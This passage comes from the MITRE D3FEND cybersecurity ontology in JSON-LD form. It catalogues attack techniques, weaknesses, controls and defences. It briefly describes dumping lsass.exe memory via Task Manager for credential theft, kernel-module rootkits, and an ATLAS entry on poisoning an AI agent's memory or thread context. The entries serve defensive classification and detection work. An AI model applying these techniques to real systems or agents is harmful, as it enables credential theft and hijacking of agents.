        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001169"
    },
    {
      "@id": "d3f:T1182",
      "@type": "owl:Class",
      "d3f:attack-id": "T1182",
      "d3f:definition": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.009",
      "rdfs:label": "AppCert DLLs",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:SetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Set Thread Context",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N240af7a608fb415ca0a946ac13f986cc"
        }
      ]
    },
    {
      "@id": "_:N240af7a608fb415ca0a946ac13f986cc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:T1135",
      "@type": "owl:Class",
      "d3f:attack-id": "T1135",
      "d3f:definition": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.",
      "rdfs:label": "Network Share Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CWE-798",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-798",
      "d3f:definition": "The product contains hard-coded credentials, such as a password or cryptographic key.",
      "d3f:weakness-of": {
        "@id": "d3f:AuthenticationFunction"
      },
      "rdfs:label": "Use of Hard-coded Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1391"
        },
        {
          "@id": "d3f:CWE-344"
        },
        {
          "@id": "d3f:CWE-671"
        },
        {
          "@id": "_:N62b35cb4cdc54a52a4cdb935ef603d4e"
        }
      ]
    },
    {
      "@id": "_:N62b35cb4cdc54a52a4cdb935ef603d4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationFunction"
      }
    },
    {
      "@id": "d3f:FileFooterBlockContent",
      "@type": "owl:Class",
      "d3f:definition": "The content of a footer block not including the signature.",
      "rdfs:label": "File Footer Block Content",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:CWE-793",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-793",
      "d3f:definition": "The product receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component.",
      "rdfs:label": "Only Filtering One Instance of a Special Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-792"
      }
    },
    {
      "@id": "d3f:Expectation-maximizationClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EMC",
      "d3f:definition": "An unsupervised clustering algorithm that also extends to NLP applications like Latent Dirichlet Allocation, the Baum-Welch algorithm for Hidden Markov Models, and medical imaging.",
      "d3f:kb-article": "## References\nTowards Data Science. (n.d.). Expectation Maximization Explained. [Link](https://towardsdatascience.com/expectation-maximization-explained-c82f5ed438e5#:~:text=Expectation%20Maximization%20(EM)%20is%20a,Markov%20Models%2C%20and%20medical%20imaging.)",
      "rdfs:label": "Expectation-maximization Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Distribution-basedClustering"
      }
    },
    {
      "@id": "d3f:AML.T0080",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0080",
      "d3f:definition": "Adversaries may attempt to manipulate the context used by an AI agent's large language model (LLM) to influence the responses it generates or actions it takes. This allows an adversary to persistently change the behavior of the target agent and further their goals.\n\nContext poisoning can be accomplished by prompting an LLM to add instructions or preferences to memory (See [Memory](/techniques/AML.T0080.000)) or by simply prompting an LLM that uses prior messages in a thread as part of its context (See [Thread](/techniques/AML.T0080.001)).",
      "rdfs:label": "AI Agent Context Poisoning - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0080"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "AI Agent Context Poisoning"
    },
    {
      "@id": "d3f:BayesianEstimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BE",
      "d3f:definition": "A Bayes estimator or a Bayes action is an estimator or decision rule that minimizes the posterior expected value of a loss function (i.e., the posterior expected loss).",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Bayes estimator. [Link](https://en.wikipedia.org/wiki/Bayes_estimator)",
      "rdfs:label": "Bayesian Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:BayesianMethod"
      }
    },
    {
      "@id": "d3f:T1204.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:URL"
      },
      "d3f:attack-id": "T1204.001",
      "d3f:definition": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Malicious Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1204"
        },
        {
          "@id": "_:Nefc660cc3e674515a86381078e8d3456"
        },
        {
          "@id": "_:N3fbeb59236e84a69b4c2a3edfe67f218"
        }
      ]
    },
    {
      "@id": "_:Nefc660cc3e674515a86381078e8d3456",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "_:N3fbeb59236e84a69b4c2a3edfe67f218",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:T1215",
      "@type": "owl:Class",
      "d3f:attack-id": "T1215",
      "d3f:definition": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.006",
      "rdfs:label": "Kernel Modules and Extensions",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-42",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-42",
      "d3f:definition": "The product accepts path input in the form of trailing dot ('filedir.') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename.' (Trailing Dot)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002546_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization physically disables or removes organization-defined connection ports or input/output devices on organization-defined information systems or information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002546"
    },
    {
      "@id": "d3f:PlatformHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PlatformHardening"
      ],
      "d3f:d3fend-id": "D3-PH",
      "d3f:definition": "Hardening components of a Platform with the intention of making them more difficult to exploit.\n\nPlatforms include components such as:\n* BIOS UEFI Subsystems\n* Hardware security devices such as Trusted Platform Modules\n* Boot process logic or code\n* Kernel software components",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:synonym": [
        "Endpoint Hardening",
        "System Hardening"
      ],
      "rdfs:label": "Platform Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N698fbc6005ea428eba1669429cf68a45"
        }
      ]
    },
    {
      "@id": "_:N698fbc6005ea428eba1669429cf68a45",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:URL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:Resource"
      },
      "d3f:definition": "A Uniform Resource Locator (URL), commonly informally termed a web address (a term which is not defined identically) is a reference to a web resource that specifies its location on a computer network and a mechanism for retrieving it. A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. A URL implies the means to access an indicated resource, which is not true of every URI. URLs occur most commonly to reference web pages (http), but are also used for file transfer (ftp), email (mailto), database access (JDBC), and many other applications.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Uniform_Resource_Locator"
      },
      "rdfs:label": "URL",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/url"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:Nf77702bb33ee4874a09e5816f710fb30"
        }
      ],
      "skos:altLabel": "Uniform Resource Locator"
    },
    {
      "@id": "_:Nf77702bb33ee4874a09e5816f710fb30",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:Reference-GuideToStorageEncryptionTechnologiesForEndUserDevices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-111.pdf"
      },
      "d3f:kb-abstract": "Many threats against end user devices could cause information stored on the devices to be accessed by unauthorized parties. To prevent such disclosures of information, particularly of personally identifiable information (PII) and other sensitive data, the information needs to be secured. Securing other components of end user devices, such as operating systems, is also necessary, but in many cases storage security, which is the process of allowing only authorized parties to access and use stored information. The primary security controls for restricting access to sensitive information stored on end user devices are encryption and authentication. Encryption can be applied granularly, such as to an individual file containing sensitive information, or broadly, such as encrypting all stored data. The appropriate encryption solution for a particular situation depends primarily upon the type of storage, the amount of information that needs to be protected, the environments where the storage will be located, and the threats that need to be mitigated.",
      "d3f:kb-author": "Karen Scarfone, Murugiah Souppaya, and Matt Sexton",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-111 - Guide to Storage Encryption Technologies for End User Devices",
      "rdfs:label": "Reference - Guide to Storage Encryption Technologies for End User Devices"
    },
    {
      "@id": "d3f:NetworkConnectionFailEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection attempt fails.",
      "rdfs:label": "Network Connection Fail Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:PhysicalLocation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The terms location  [here, a physical location] and place in geography are used to identify a point or an area on the Earth's surface or elsewhere. The term location generally implies a higher degree of certainty than place, which often indicates an entity with an ambiguous boundary, relying more on human or social attributes of place identity and sense of place than on geometry. The distinction between space and place is considered a central concern of geography, and has been addressed by scholars such as Yi-Fu Tuan and John Agnew.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Location_(geography)"
      },
      "rdfs:label": "Physical Location",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/location"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:OTEvent",
      "@type": "owl:Class",
      "d3f:definition": "A discrete occurrence within an operational technology environment that denotes a significant change in state, execution of a command, or transmission of information.",
      "rdfs:label": "OT Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nff3d8922641041578b1b8f004d369fdc"
        }
      ]
    },
    {
      "@id": "_:Nff3d8922641041578b1b8f004d369fdc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:OTConnectionCommand",
      "@type": "owl:Class",
      "d3f:definition": "Establish a network connection with a device.",
      "rdfs:comment": [
        "BACnet: vtOpen\nBACnet: vtClose ",
        "ENIP: Register Session\nENIP: Unregister Session"
      ],
      "rdfs:label": "OT Connection Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:VersionControlTool",
      "@type": "owl:Class",
      "d3f:definition": "Version control tools are tools that are used to conduct version control. A component of software configuration management, version control, also known as revision control, source control, or source code management systems are systems responsible for the management of changes to documents, computer programs, large web sites, and other collections of information. Changes are usually identified by a number or letter code, termed the \"revision number\", \"revision level\", or simply \"revision\". For example, an initial set of files is \"revision 1\". When the first change is made, the resulting set is \"revision 2\", and so on. Each revision is associated with a timestamp and the person making the change. Revisions can be compared, restored, and with some types of files, merged.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Version_control"
      },
      "rdfs:label": "Version Control Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Software_configuration_management"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": [
        "Revision Control",
        "Source Control"
      ]
    },
    {
      "@id": "d3f:OperatingSystemClock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system clock is the primary software clock maintained by the operating system, representing the system's current time. It is used for timestamping files, scheduling tasks, and synchronizing processes.",
      "d3f:implemented-by": {
        "@id": "d3f:Kernel"
      },
      "rdfs:label": "Operating System Clock",
      "rdfs:seeAlso": {
        "@id": "https://linux.die.net/sag/hw-sw-clocks.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SoftwareClock"
        },
        {
          "@id": "_:Nde0cd72fd0cb4a54b2b287c6dd1d6c66"
        }
      ]
    },
    {
      "@id": "_:Nde0cd72fd0cb4a54b2b287c6dd1d6c66",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "d3f:Reference-CredentialDumpingViaWindowsTaskManager_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-08-001/"
      },
      "d3f:kb-abstract": "The Windows Task Manager may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting lsass.exe, and clicking \"Create dump file\". This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.\n\nThis requires filesystem data to determine whether files have been created.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-08-001: Credential Dumping via Windows Task Manager",
      "rdfs:label": "Reference - CAR-2019-08-001: Credential Dumping via Windows Task Manager - MITRE"
    },
    {
      "@id": "d3f:CWE-1065",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1065",
      "d3f:definition": "The product uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server.",
      "rdfs:label": "Runtime Resource Management Control Element in a Component Built to Run on Application Servers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:ApplicationDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the disabling of an application, preventing it from being operational or accessed until re-enabled.",
      "rdfs:label": "Application Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:Nea705141417841ef9df472a4486e5182"
        }
      ]
    },
    {
      "@id": "_:Nea705141417841ef9df472a4486e5182",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationEnableEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Separate Processing Domains",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "rdfs:label": "AC-6(4)"
    },
    {
      "@id": "d3f:T1585.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585.003",
      "d3f:definition": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)",
      "rdfs:label": "Cloud Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1585"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-003%3AIndicatorBlocking-DriverUnloaded_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-003/"
      },
      "d3f:kb-abstract": "Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-003: Indicator Blocking - Driver Unloaded",
      "rdfs:label": "Reference - CAR-2020-09-003: Indicator Blocking - Driver Unloaded - MITRE"
    },
    {
      "@id": "d3f:CCI-001374_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, prohibits the transfer of organization-defined unsanctioned information in accordance with the organization-defined security policy.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001374"
    },
    {
      "@id": "d3f:DigitalFingerprint",
      "@type": "owl:Class",
      "d3f:definition": "A digital signature uniquely identifies data and has the property that changing a single bit in the data will cause a completely different message digest to be generated.",
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/digital_fingerprint"
      },
      "rdfs:label": "Digital Fingerprint",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/fingerprint"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "d3f:CCI-002711_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:TPMBootIntegrity"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs an integrity check of organization-defined firmware at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002711"
    },
    {
      "@id": "d3f:CWE-1049",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1049",
      "d3f:definition": "The product performs a data query with a large number of joins and sub-queries on a large data table.",
      "rdfs:label": "Excessive Data Query Operations in a Large Data Table",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:LoadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call that loads a driver or extension into the kernel.",
      "d3f:loads": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "d3f:KernelModule"
        }
      ],
      "rdfs:label": "Load Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N3ab39c85780841e182d4075bd3f50798"
        },
        {
          "@id": "_:N0cd2fdf510604fff81c1e26e81e8f309"
        }
      ]
    },
    {
      "@id": "_:N3ab39c85780841e182d4075bd3f50798",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:N0cd2fdf510604fff81c1e26e81e8f309",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:DNSAllowlisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSAllowlisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-DNSAL",
      "d3f:definition": "Permitting only approved domains and their subdomains to be resolved.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DNSWhitelist-DNSWL-EmailAuthenticationMethodExtension"
      },
      "d3f:synonym": "DNS Whitelisting",
      "rdfs:label": "DNS Allowlisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N00f8e83848f84254af2b2ee82fdf178f"
        }
      ]
    },
    {
      "@id": "_:N00f8e83848f84254af2b2ee82fdf178f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:PeripheralFirmwareVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PeripheralFirmwareVerification"
      ],
      "d3f:d3fend-id": "D3-PFV",
      "d3f:definition": "Cryptographically verifying peripheral firmware integrity.",
      "d3f:kb-article": "# How it works\nPeripheral firmware is collected and analyzed on a host either periodically or on demand. This information may be collected for future comparisons.\n\nChanges in firmware hash values may indicate that the firmware has been tampered with or that firmware images are not maintained to current baselined versions, or even that known vulnerable versions are deployed.\n\n## Considerations\n* Trust baselines will need to be generated for specific devices\n* Changes to trusted configurations will need to be managed across the enterprise",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareVerificationEclypsium"
        },
        {
          "@id": "d3f:Reference-FirmwareVerificationTrapezoid"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:PeripheralFirmware"
      },
      "rdfs:label": "Peripheral Firmware Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "_:N95a467f4debd4b2e81685e9951fa63d1"
        }
      ]
    },
    {
      "@id": "_:N95a467f4debd4b2e81685e9951fa63d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PeripheralFirmware"
      }
    },
    {
      "@id": "d3f:Reference-AuditUserAccountManagement",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-account-management"
      },
      "d3f:kb-abstract": "Audit User Account Management determines whether the operating system generates audit events when specific user account management tasks are performed.",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "d3f:kb-reference-title": "Audit User Account Management",
      "rdfs:label": "Reference - Audit User Account Management"
    },
    {
      "@id": "d3f:Reference-USBFilterForHubMaliciousCodePreventionSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9990325B2/en"
      },
      "d3f:kb-abstract": "The present invention relates generally to computer systems, and more specifically, to a universal serial bus (USB) filter hub for a computer system.",
      "d3f:kb-author": "Steven R Hetzler, Daniel F Smith",
      "d3f:kb-organization": "International Business Machines Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:kb-reference-title": "Universal serial bus (USB) filter hub malicious code prevention system",
      "rdfs:label": "Reference - USB filter for hub malicious code prevention system"
    },
    {
      "@id": "d3f:CWE-1249",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1249",
      "d3f:definition": "The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application's model of the OS's state is inconsistent with the OS's actual state.",
      "d3f:synonym": "Ghost in the Shell",
      "rdfs:label": "Application-Level Admin Tool with Inconsistent View of Underlying Operating System",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1250"
      }
    },
    {
      "@id": "d3f:CWE-668",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-668",
      "d3f:definition": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.",
      "rdfs:label": "Exposure of Resource to Wrong Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:Reference-WindowsRemoteManagement_WinRM_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": ""
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AdministrativeNetworkActivityAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-006: Windows Remote Management (WinRM)",
      "rdfs:label": "Reference - CAR-2014-11-006: Windows Remote Management (WinRM) - MITRE"
    },
    {
      "@id": "d3f:OSAPIAllocateMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that requests and allocates a region of memory for use by a process or application.",
      "d3f:invokes": {
        "@id": "d3f:AllocateMemory"
      },
      "rdfs:label": "OS API Allocate Memory",
      "rdfs:subClassOf": [
        {
